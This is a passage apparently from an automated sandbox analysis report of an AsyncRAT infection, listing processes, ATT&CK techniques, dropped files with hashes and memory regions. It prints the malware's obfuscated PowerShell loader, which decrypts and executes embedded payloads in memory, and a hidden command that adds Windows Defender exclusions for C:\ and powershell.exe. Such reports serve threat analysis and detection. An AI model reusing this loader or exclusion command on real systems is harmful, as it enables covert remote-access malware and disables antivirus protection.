'#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZTKslE6OdsXNtdeXo76Lj86BwdjokmZoErSJ0CEwRis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ftBNGOmShOOXC7u6Pue69A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$ZjNXA=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$hkZyt=New-Object System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$YeAxa=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($ZjNXA, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $YeAxa.CopyTo($hkZyt); $YeAxa.Dispose(); $ZjNXA.Dispose(); $hkZyt.Dispose(); $hkZyt.ToArray();}function execute_function($param_var,$param2_var){ IEX '$hMSFrZstRXKXXSE=[System.ROBFOBFUSCUDAeOBFOBFUSCUDAflOBFOBFUSCUDAectOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAAsOBFOBFUSCUDAseOBFOBFUSCUDAmbOBFOBFUSCUDAlOBFOBFUSCUDAyOBFOBFUSCUDA]::LOBFOBFUSCUDAoOBFOBFUSCUDAaOBFOBFUSCUDAdOBFOBFUSCUDA([byte[]]$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$YHCrtoDbeFwPknhvovWwaLUfKHQVaPjnhUuqCjeMELNaUjhfKCwCbvDmNxHMyHbovjIqSQTfrkRpYUkAzKlxtHmLqhDeBroXJyEKARmTJrlRDooTmhmNvDVOXXZLnODZWUFzpzZHxsObwuhcSKSufA=$hMSFrZstRXKXXSE.OBFOBFUSCUDAEOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDAPOBFOBFUSCUDAoOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$YHCrtoDbeFwPknhvovWwaLUfKHQVaPjnhUuqCjeMELNaUjhfKCwCbvDmNxHMyHbovjIqSQTfrkRpYUkAzKlxtHmLqhDeBroXJyEKARmTJrlRDooTmhmNvDVOXXZLnODZWUFzpzZHxsObwuhcSKSufA.OBFOBFUSCUDAIOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAoOBFOBFUSCUDAkOBFOBFUSCUDAeOBFOBFUSCUDA($null, $param2_var);'.Replace('OBFOBFUSCUDA', '');}$zQ = 'C:\Users\Admin\AppData\Roaming\inicia_str_519.bat';$host.UI.RawUI.WindowTitle = $zQ;$UwrDhZatxq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($zQ).Split([Environment]::NewLine);foreach ($EN in $UwrDhZatxq) { if ($EN.StartsWith(':: ')) { $Z=$EN.Substring(3); break; }}$payloads_var=[string[]]$Z.Split('\');IEX '$payload1_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAse6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDAriOBFOBFUSCUDAnOBFOBFUSCUDAgOBFOBFUSCUDA($payloads_var[0])));'.Replace('OBFOBFUSCUDA', '');IEX '$payload2_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArOBFOBFUSCUDAt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAsOBFOBFUSCUDAeOBFOBFUSCUDA6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtrOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAg($payloads_var[1])));'.Replace('OBFOBFUSCUDA', '');execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('OBFOBFUSCUDA'));
                      8⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4244
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5092
      • C:\Windows\system32\wbem\WmiApSrv.exe
        C:\Windows\system32\wbem\WmiApSrv.exe
        1⤵
          PID:1804
        • C:\Windows\system32\taskkill.exe
          taskkill /IM cmstp.exe /F
          1⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2860

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          55d32bc1c206428fe659912b361362de

          SHA1

          7056271e5cf73b03bafc4e616a0bc5a4cffc810f

          SHA256

          37bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff

          SHA512

          2602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          17KB

          MD5

          b250a8a63aea6a0ed07dc1ac7344dadd

          SHA1

          ed28d7c83e779f4149a1b8151de025590d4737e3

          SHA256

          4891fd682c27291f7ba859bd87457454b57ab3fb65ad6b929f3d980a8d0a33d8

          SHA512

          c5fc80d84ebecca254dfd5135bf06590888f0132a708bccce3a6d0dbb162611c2ba5e96a8a1069f9da58f2cb21b0acb83851bec8ca730f27798f21e64d12b46b

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          215fa5932830c64a7049274a3716ba58

          SHA1

          19b3835fe5674c620bbac144e3b042fa89c54070

          SHA256

          7fcdd9641321e0b0fc76cab08a789125783bbe07d752ca14bc6184c4fd381986

          SHA512

          5a04070b08d0e459949190d8238684e0b2b8a5b7cad16041724e8913b6591944abfb535f849d17d0714c2f9a34910ac8147100978848061fd83600e4b9eb1803

        • C:\Users\Admin\AppData\Local\Temp\1bhio02a\1bhio02a.dll

          Filesize

          4KB

          MD5

          657b0adbac7a1c08f4bb9a86cfc24646

          SHA1

          3fa49ecc15db9560a56d594dc5086bac43b3688c

          SHA256

          e3e12bd6477f23b3c51ca17a347dc14f9528a3bd671b6230db4fb1efc3815a6d

          SHA512

          0c328ac86f50d7d2b85c5215b8ec0a68d2a1b3b076e090f1ef44b859d09ce3bc4382bd7f02e3fb92d766f449e9c451cd2c610ea19e6fe2660789ada6e6a5ff71

        • C:\Users\Admin\AppData\Local\Temp\7254_output.vbs

          Filesize

          203KB

          MD5

          02081ae0dbab5cbb3ba6fb3d316bb850

          SHA1

          0b422b950e717427ec53709384b214433871f78b

          SHA256

          f93f8db130adb1cb891c6a8591d1c2f518a4ba3d5aed98d1e7b530030b0297bb

          SHA512

          7ae8c0859f25c7cecaa0be83d5ac99d20bde7287ef1f49ddd3114d4683c8ec05a2947f0c0d27b62ea5b4b0764d6ae0a104ffa7d6d84a46b1bd0ecb1eac9d718d

        • C:\Users\Admin\AppData\Local\Temp\AsyncRAT.exe

          Filesize

          6.4MB

          MD5

          97a429c4b6a2cb95ece0ddb24c3c2152

          SHA1

          6fcc26793dd474c0c7113b3360ff29240d9a9020

          SHA256

          06899071233d61009a64c726a4523aa13d81c2517a0486cc99ac5931837008e5

          SHA512

          524a63f39e472bd052a258a313ff4f2005041b31f11da4774d3d97f72773f3edb40df316fa9cc2a0f51ea5d8ac404cfdd486bab6718bae60f0d860e98e533f89

        • C:\Users\Admin\AppData\Local\Temp\RESD3EA.tmp

          Filesize

          1KB

          MD5

          bb94428131643ad7346f4f544782b827

          SHA1

          ce1a78a23484118170794d592c6117c2b2009f5d

          SHA256

          773f5319045bbe0d911853e987ff83ca5c260a6aa598cce98b004538c747f646

          SHA512

          0978fee96c3a3d29b6ddc69eadac3e0ea0128e122af2c6478157e8e5ea06d5a7164d314e9eb30ef903ea51486c5873d63cce8f18bd64c7b3644cfda1b3446e33

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t1ezlazc.xhe.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\c.bat

          Filesize

          74KB

          MD5

          88e72154cfed4a9932b4a4799aab6df7

          SHA1

          043136d11ffa2f5aa6c8f6e961686a31a9eb50ef

          SHA256

          3dc1f5d2c9260a882c6ebe35a4be8b407eced4ab579552b49d3e4d60ea68a373

          SHA512

          f1479b3cab97a661360e9582a9cf5d49a28f8d92b63710e02345a3dfc19c151d8923990cf4c41936df9baae25a907e0c699133a8a0c4f09858d7a1021abf0bcf

        • C:\Users\Admin\AppData\Roaming\inicia_str_519.vbs

          Filesize

          114B

          MD5

          90e2134354b1253c0ffbb04fe5773521

          SHA1

          d6ce30f8bece3a8a9755f01f38a5d80c086c79f3

          SHA256

          f45f0ccc8e04327653e1576bc14464b4208dc54e3feb5f1231f64e87d9c7132b

          SHA512

          670ac94934839d83c40574149500fc9a5529c2ad640a471afe8747f0af93ba17a3abee8c13d1860a823822f8b88d42d253af3f95f502ec2049ffab8ae146ae12

        • C:\windows\temp\3jm2yug4.inf

          Filesize

          663B

          MD5

          27581dbbe3c3840ce72f99c21071898a

          SHA1

          898afeb9523df9367c74a01c0dbecf6b637f3cb1

          SHA256

          c5f2bbdebccd52c3eba3c97a251ffa2ccd01f64de764e560f804045fe868d27b

          SHA512

          0b9c4531e8be5b292638cb2cad7fd1b72ed3f1aa20ea027b9a013a8bfb2daaa4a25a40c37423e0924d110bbbbfad4a6e21aa03f4694978d205d7ac9739567d9f

        • \??\c:\Users\Admin\AppData\Local\Temp\1bhio02a\1bhio02a.0.cs

          Filesize

          2KB

          MD5

          b8106096972fb511e0cf8b99386ecf93

          SHA1

          3003ba3a3681ba16d124d5b2305e6cc59af79b44

          SHA256

          49d2a0f78cbec3d87396b6f52f791c66505edeec87a70d4ce45721288210da02

          SHA512

          218bd9cd17c56d2e138205a197780cc2a5a81bfce7d5439eecb168f61955ba97793e7333425c064f6b6337e1f70c75bd373a7fb502a8c538fb046600018f871e

        • \??\c:\Users\Admin\AppData\Local\Temp\1bhio02a\1bhio02a.cmdline

          Filesize

          369B

          MD5

          1cede888dfab3a22479b7e4ec0fca1be

          SHA1

          9167f8b22d0a5513a82029e794b24aedc0f2a46c

          SHA256

          15e11530428d7ad4305e65dd7fc47c5463f98776d47f0f0c6833eafb9f9d62bd

          SHA512

          48d1ec0de82af0f5f4bfceb9d93d90d04efd8b62ae3b67d93953a61b0846787a3663e12c0716aba613966d290ca37c4e3e167bf218a8de943724ad71077d85eb

        • \??\c:\Users\Admin\AppData\Local\Temp\1bhio02a\CSCD25AD4CC2B1A4F18A9B2ACF24C8DA61.TMP

          Filesize

          652B

          MD5

          b0fd791662b96572a884ab3b8b59f43e

          SHA1

          3ab53236a7ce9bb7a0992a5eee1eb2b31ce82460

          SHA256

          db4f00df4bfbf49be0e8a495615e5cb6105195fe22ceb22c6d816dfcb0490bc2

          SHA512

          b6195b3a99fdaaa41f671cc3f100ee9cb38f60edc41cc00dc35fc0c256c2482f5fbd0dcbe763b466be5e07aba568e3d8711e2e1eba2c7145b6921dac598e11ae

        • memory/756-8-0x00007FF840FE3000-0x00007FF840FE5000-memory.dmp

          Filesize

          8KB

        • memory/756-11-0x000002C233150000-0x000002C2333A2000-memory.dmp

          Filesize

          2.3MB

        • memory/756-9-0x000002C218600000-0x000002C218C6A000-memory.dmp

          Filesize

          6.4MB

        • memory/756-55-0x00007FF840FE3000-0x00007FF840FE5000-memory.dmp

          Filesize

          8KB

        • memory/2524-77-0x00000000068C0000-0x00000000068DE000-memory.dmp

          Filesize

          120KB

        • memory/2524-79-0x0000000008260000-0x00000000088DA000-memory.dmp

          Filesize

          6.5MB

        • memory/2524-62-0x0000000005BD0000-0x00000000061F8000-memory.dmp

          Filesize

          6.2MB

        • memory/2524-63-0x00000000059E0000-0x0000000005A02000-memory.dmp

          Filesize

          136KB

        • memory/2524-64-0x0000000006200000-0x0000000006266000-memory.dmp

          Filesize

          408KB

        • memory/2524-65-0x0000000006270000-0x00000000062D6000-memory.dmp

          Filesize

          408KB

        • memory/2524-75-0x00000000063A0000-0x00000000066F4000-memory.dmp

          Filesize

          3.3MB

        • memory/2524-83-0x00000000088E0000-0x0000000008E84000-memory.dmp

          Filesize

          5.6MB

        • memory/2524-78-0x0000000006900000-0x000000000694C000-memory.dmp

          Filesize

          304KB

        • memory/2524-61-0x0000000005510000-0x0000000005546000-memory.dmp

          Filesize

          216KB

        • memory/2524-80-0x0000000006E50000-0x0000000006E6A000-memory.dmp

          Filesize

          104KB

        • memory/2524-81-0x0000000007A70000-0x0000000007A78000-memory.dmp

          Filesize

          32KB

        • memory/2524-82-0x0000000007A80000-0x0000000007A8E000-memory.dmp

          Filesize

          56KB

        • memory/3084-2-0x00007FF6B8470000-0x00007FF6B8E43000-memory.dmp

          Filesize

          9.8MB

        • memory/3328-12-0x000001D2D8610000-0x000001D2D8632000-memory.dmp

          Filesize

          136KB

        • memory/3328-22-0x000001D2D8CE0000-0x000001D2D8CFC000-memory.dmp

          Filesize

          112KB

        • memory/3328-35-0x000001D2D8CC0000-0x000001D2D8CC8000-memory.dmp

          Filesize

          32KB

        • memory/3644-106-0x0000000007880000-0x0000000007923000-memory.dmp

          Filesize

          652KB

        • memory/3644-107-0x0000000007A30000-0x0000000007A3A000-memory.dmp

          Filesize

          40KB

        • memory/3644-108-0x0000000007C60000-0x0000000007CF6000-memory.dmp

          Filesize

          600KB

        • memory/3644-109-0x0000000007BD0000-0x0000000007BE1000-memory.dmp

          Filesize

          68KB

        • memory/3644-105-0x0000000007810000-0x000000000782E000-memory.dmp

          Filesize

          120KB

        • memory/3644-95-0x00000000703F0000-0x000000007043C000-memory.dmp

          Filesize

          304KB

        • memory/3644-94-0x0000000007830000-0x0000000007862000-memory.dmp

          Filesize

          200KB

        • memory/4244-130-0x0000000006360000-0x0000000006372000-memory.dmp

          Filesize

          72KB

        • memory/4244-131-0x00000000079D0000-0x0000000007A6C000-memory.dmp

          Filesize

          624KB

        • memory/4244-133-0x00000000089E0000-0x0000000008A7C000-memory.dmp

          Filesize

          624KB

        • memory/4244-132-0x0000000008960000-0x00000000089D6000-memory.dmp

          Filesize

          472KB

        • memory/4244-134-0x0000000008940000-0x000000000895E000-memory.dmp

          Filesize

          120KB

        • memory/4244-136-0x0000000008AB0000-0x0000000008AF0000-memory.dmp

          Filesize

          256KB

        • memory/4244-137-0x0000000008AF0000-0x0000000008AFA000-memory.dmp

          Filesize

          40KB

        • memory/4244-138-0x0000000008B70000-0x0000000008BD8000-memory.dmp

          Filesize

          416KB

        • memory/4244-139-0x0000000008DA0000-0x0000000008E32000-memory.dmp

          Filesize

          584KB